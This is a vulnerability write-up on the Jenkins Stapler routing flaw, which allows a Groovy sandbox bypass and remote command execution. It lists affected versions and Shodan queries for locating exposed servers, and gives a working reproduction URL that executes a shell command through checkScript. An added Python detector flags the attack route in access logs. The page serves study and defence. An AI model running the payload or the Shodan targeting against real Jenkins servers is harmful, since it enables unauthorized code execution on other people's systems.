Vulnerability Overview
Jenkins uses the Stapler web framework, which routes URL path segments to public Java methods. Because this routing is not restricted, an attacker can craft a path that reaches sensitive Java methods.
This routing weakness enables the discovery of numerous exploit chains. The most severe impact is bypassing the Groovy sandbox, allowing unauthorized users to execute arbitrary commands. Before executing a Groovy script in the sandbox, Jenkins compiles and checks the script for errors. This checking step is not sandboxed, so attackers can use meta-programming techniques to execute arbitrary commands while the check runs.
Affected Versions
- Jenkins <= 2.153
- Jenkins LTS <= 2.138.3
Shodan Search Syntax
http.favicon.hash:81586312

Since Shodan does not support wildcards, specific version numbers can be filtered using the keyword X-Jenkins:
http.favicon.hash:81586312 "X-Jenkins: 2.13"

Exploit
https://github.com/orangetw/awesome-jenkins-rce-2019
Environment Setup
Use Vulhub for reproduction. Its environment starts a Jenkins 2.138 instance with the vulnerable plugins already installed.

Vulnerability Reproduction
http://your-ip:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x { public x(){ "touch /tmp/success".execute() } }

Command executed successfully.
Root Cause Analysis
Jenkins does not keep web request logs of its own, so exploitation cannot be traced from the application after the fact.
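Because Jenkins itself keeps no request log, the trace has to come from whatever sits in front of it (reverse proxy or load balancer). The following is an added example, not part of the original writeup: it checks an X-Jenkins version string against the affected ranges listed above, and scans constructed nginx-style access-log lines for the descriptorByName/.../checkScript route used in the reproduction. The log lines and the function names are assumptions.

```python
import re
from urllib.parse import unquote

# Affected ranges as stated on the page. Weekly releases have two components
# (e.g. 2.153); LTS releases have three (e.g. 2.138.3).
MAX_WEEKLY = (2, 153)
MAX_LTS = (2, 138, 3)

def is_affected(version: str) -> bool:
    """Return True if an X-Jenkins header value falls inside the affected range."""
    parts = tuple(int(p) for p in version.strip().split("."))
    if len(parts) == 3:
        return parts <= MAX_LTS
    if len(parts) == 2:
        return parts <= MAX_WEEKLY
    raise ValueError(f"unrecognised Jenkins version: {version!r}")

# Stapler route from the reproduction: /descriptorByName/<class>/checkScript.
# Matching on the route rather than the value= payload catches any script body.
ROUTE = re.compile(r"/descriptorByName/[^/?\s]+/checkScript\b")
REQUEST = re.compile(r'"(?:GET|POST)\s+(\S+)')

def flag_requests(log_lines):
    """Return (line_number, decoded_path) for every access-log line hitting checkScript."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        path = unquote(m.group(1))  # percent-decode so encoded slashes/dots still match
        if ROUTE.search(path):
            hits.append((n, path))
    return hits

# Constructed sample log (nginx combined format); line 2 is a harmless probe of the route.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2019:10:00:00 +0000] "GET /login HTTP/1.1" 200 1234',
    '10.0.0.9 - - [01/Jan/2019:10:00:05 +0000] "GET /securityRealm/user/admin/descriptorByName/'
    'org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript'
    '?sandbox=true&value=public%20class%20x%20%7B%7D HTTP/1.1" 200 0',
    '10.0.0.5 - - [01/Jan/2019:10:00:09 +0000] "GET /job/build/api/json HTTP/1.1" 200 77',
]

if __name__ == "__main__":
    print("2.138.3 affected:", is_affected("2.138.3"))
    for n, path in flag_requests(SAMPLE_LOG):
        print(f"line {n}: checkScript hit -> {path}")
```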
Remediation
Upgrade to the latest version.